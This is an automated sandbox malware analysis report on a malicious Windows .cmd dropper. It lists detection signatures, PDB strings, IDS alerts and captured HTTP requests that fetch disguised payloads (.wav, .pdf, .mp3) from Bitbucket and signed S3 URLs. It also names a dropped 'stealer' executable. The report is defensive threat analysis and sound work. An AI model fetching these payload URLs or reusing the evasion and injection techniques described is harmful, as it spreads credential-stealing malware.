Windows Analysis Report
849128312.cmd

Overview

General Information

Sample name:	849128312.cmd
Analysis ID:	1532433
MD5:	e5ca9d51a4b6e15d0dc86815068d1dd3
SHA1:	1844bf3c0f506e919ed1100e71dcb57c0a68201e
SHA256:	9dc121c5c9a9a1771a52101a2c664c622b23dfd1ad31ce6c1e92c902bebdb248
Tags:	cmduser-01Xyris
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe

Avira: detection malicious, Label: HEUR/AGEN.1351837

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_08E3F54C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	7_2_08E3F550
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then jmp 08E3ADD0h	7_2_08E3AD10
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 4x nop then jmp 08E3ADD0h	7_2_08E3AD18
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	8_2_02642435
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	8_2_0264243C
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D63358h	8_2_05D62FC8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D63358h	8_2_05D62FBA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D6B3F0h	8_2_05D6B330
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D6B3F0h	8_2_05D6B338
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05D6FAB0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	8_2_05D6FAA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 4x nop then jmp 05D90E3Fh	8_2_05D90CA8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49709

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.849128312.cmd.Fjz.52f8430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.stealer-CR-0110.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.5378024.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.53821fc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.53025fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe, type: DROPPED

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-479d-95c3-d6de93f73ae8/Llbodzuyqnk.wav?response-content-disposition=attachment%3B%20filename%3D%22Llbodzuyqnk.wav%22&AWSAccessKeyId=ASIA6KOSE3BNI2FYFJS5&Signature=iHriFimLoltXdt5jxd9L4iNbvFk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQCf%2BiTBGoOb2%2FoSbo29PHijrNyTDWHeuoyFbJadJVb9wAIgS3Pt4G0c1jqGkwCwSO1mbhZlcjS9NRDtPBsZ%2BcC7n8YqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDATYITCcujwDUeM9ViqEArxZnpRlcxAbGJscSY15XkLPDxtggx1vwxhjHt0NQhSZB5XRuZ8k9rCO9Tu3AVOwZvCF3FGaai7E9BtFdD6f7b%2B6nDUz5461DuFA8IoR%2BBJoS74vostzPHD9LVhTzzbJpesAYaOyNAhSMMG53vaEa0suSSIDddaMf57foW3R%2BuhHGt5V0IQGqDe68Stt6m6HnDihHDQdXKPx4qVQfKHpX9FHo7VAmtDXE50K2WemvrMe%2BcEf97cH4wcg%2FQyRaNkDvSGkMGJEXbxNIOBKlLYG2gDS8b9XJ4vu08n7DOi%2FE%2B9Lj%2BxtuLQXibeswsoQ6kxoOwWASrDOYGEXcOHvDOrDbgJ0Ogs9MNyurbgGOp0Bitz4Ty9PFWwjYC4fwyQ%2FuWalhv%2F4xhiZYGsaxi%2B7S9X5XyEJoiNoWnrwR%2F90hmXbpLnnxAPPTDBIsFEzXlN5vCX0GzaR234%2BwdIrcCMX9%2Bt%2FDbCW8e19US7mkjuHLpVxz4Mu%2Bl9bbNbUOSX5LtLVSHOGZ2MUbODnugftkxQ2hQr%2FAlpqx2vQ7Av%2Fx5dweTJj1eWeoFNiKYXSAWqX6Q%3D%3D&Expires=1728798308 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Gqjmdstn.pdf HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-485a-b261-bddc3faeff6c/Hgjcrxfnz.mp3?response-content-disposition=attachment%3B%20filename%3D%22Hgjcrxfnz.mp3%22&AWSAccessKeyId=ASIA6KOSE3BNIEIP43DP&Signature=B5adOCQBGaXXStvtgXJrT%2FK011k%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIEKWj%2FjyJyUla4TUxj2qwDJeUpL8HAtTC9v2mxsTnr%2FtAiEAhX3oj6Xtqz7EgE9a8P5stTogLwKy2JdlhKi15IG8BZYqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDAFClDm68vTnYNr3GCqEApcGUDsrbHb6g7SkUBVzttzG23544pAb24muMUib8sEh4SMVlpf48ZeWA3DOIDSoeIwy3s0fXGwimVWr8HZ%2BpPpZYiQsLVffDmcpe3iR3yNr3FctMSfhkmhpEhGBNXpOvWCi7FYMWqvfdwS7BVP1xPP%2FOpati3cBm3AghhtQ7zP9x4%2BCqiyUIJaOB8vmh3SyDDWSoENBxPEjnNUACfIDTpfT1b6br9zUo5yBYoX9FkUwrtRyJ1RCpVvVyuSgU9xaAAm1VI4JWql9dfF9clDNIjFz2VYgEtCPpeYI%2BrltH6SGga5djb3oBTVPAYrlZuL3JyePjqvvSWm1dtyFE7cZ8jJj7ymZMOOurbgGOp0BhZnTNFhhGUWCfhkEEJcjLMbknDlN5Ia8oI6auJNYVbnSd3pVhcPRhn2XOfyMYfh2A81qE8FkFp67uzAr9GNOgBq4kI0URvRGnx9XyxxVe%2BByCrIrs8%2FQ%2Bj9Ns%2FZmTwD7UeyxBkd8v4%2FOWGcU5QTsYA7YPwyqUDjBCfybRPoT1d1rQhME0tQLVgfkpVt1UpQvNT1u4j1HfW6VohIpkw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-4d48-9b47-4bc96cf59a21/Gqjmdstn.pdf?response-content-disposition=attachment%3B%20filename%3D%22Gqjmdstn.pdf%22&AWSAccessKeyId=ASIA6KOSE3BNNGREZMSF&Signature=v6ZxFBV4nL3oaCjj1qj3kdiRbnw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQDZG%2Fk6XI2yYOu2V0Utzpd0eIOAE7HVeOOT%2FWQy4YMOKAIgMa6sJ4%2BiMtC5KTu8k7z6l7nKIuFwY7qAWn2LWVEiC2wqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDPdE3wsOdxXVeiwi1yqEAm8JejVR0obvQzZTIMsidRXOtJskS%2BVEsymGex9hcbQefXJ3reUU40QJbwQBW5C420ningDWxPVNlpaPZapZR2BlLS9QkAtHgp8K6OH2fSduvDuArtzJuO4RwxZpsRBQhQnUbKRZZOTm%2FnA7mwNmtBV4QKGS8K2N%2FDeGbCL4nttii2NJyWIaZW%2F6dPRJRH8kFkKFOArzlPZqtRwHoEdqC%2Bm%2BYvYgXZKkNghuOv8TTnyhCInS9%2F6ppGYX92rTA7w7ebYAFSuWKnrGM6h2jbcbA17nBzCTddSDLv%2FOdA2ZtLpRSRTyJ5G49HYxR%2BM4iDqPM03geohF3N5%2Fa%2F7LVcAmG321KfxvMOOurbgGOp0BbR31EsB77Otm7dUE8SkWQ%2B7sYnhv7MVJXvkV5NTPgD8asf8VCMmDQu6beM2ybLz1%2BRcdPp3aRxLf1fobnyS6rN3M1Hnp611qVue%2BaHF9MWbLo%2B8n1dhiUj1uO7cj2pd20P4L%2BbbBaB8U6mLTpM0lqtIEw3nCOx4tsw6h6N66tp7DLpQawPIuNOaueiybJ%2FL3RUP8D9SWRN7bxWB%2BGw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.166.143.48 185.166.143.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 185.166.143.48:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-479d-95c3-d6de93f73ae8/Llbodzuyqnk.wav?response-content-disposition=attachment%3B%20filename%3D%22Llbodzuyqnk.wav%22&AWSAccessKeyId=ASIA6KOSE3BNI2FYFJS5&Signature=iHriFimLoltXdt5jxd9L4iNbvFk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQCf%2BiTBGoOb2%2FoSbo29PHijrNyTDWHeuoyFbJadJVb9wAIgS3Pt4G0c1jqGkwCwSO1mbhZlcjS9NRDtPBsZ%2BcC7n8YqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDATYITCcujwDUeM9ViqEArxZnpRlcxAbGJscSY15XkLPDxtggx1vwxhjHt0NQhSZB5XRuZ8k9rCO9Tu3AVOwZvCF3FGaai7E9BtFdD6f7b%2B6nDUz5461DuFA8IoR%2BBJoS74vostzPHD9LVhTzzbJpesAYaOyNAhSMMG53vaEa0suSSIDddaMf57foW3R%2BuhHGt5V0IQGqDe68Stt6m6HnDihHDQdXKPx4qVQfKHpX9FHo7VAmtDXE50K2WemvrMe%2BcEf97cH4wcg%2FQyRaNkDvSGkMGJEXbxNIOBKlLYG2gDS8b9XJ4vu08n7DOi%2FE%2B9Lj%2BxtuLQXibeswsoQ6kxoOwWASrDOYGEXcOHvDOrDbgJ0Ogs9MNyurbgGOp0Bitz4Ty9PFWwjYC4fwyQ%2FuWalhv%2F4xhiZYGsaxi%2B7S9X5XyEJoiNoWnrwR%2F90hmXbpLnnxAPPTDBIsFEzXlN5vCX0GzaR234%2BwdIrcCMX9%2Bt%2FDbCW8e19US7mkjuHLpVxz4Mu%2Bl9bbNbUOSX5LtLVSHOGZ2MUbODnugftkxQ2hQr%2FAlpqx2vQ7Av%2Fx5dweTJj1eWeoFNiKYXSAWqX6Q%3D%3D&Expires=1728798308 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Gqjmdstn.pdf HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
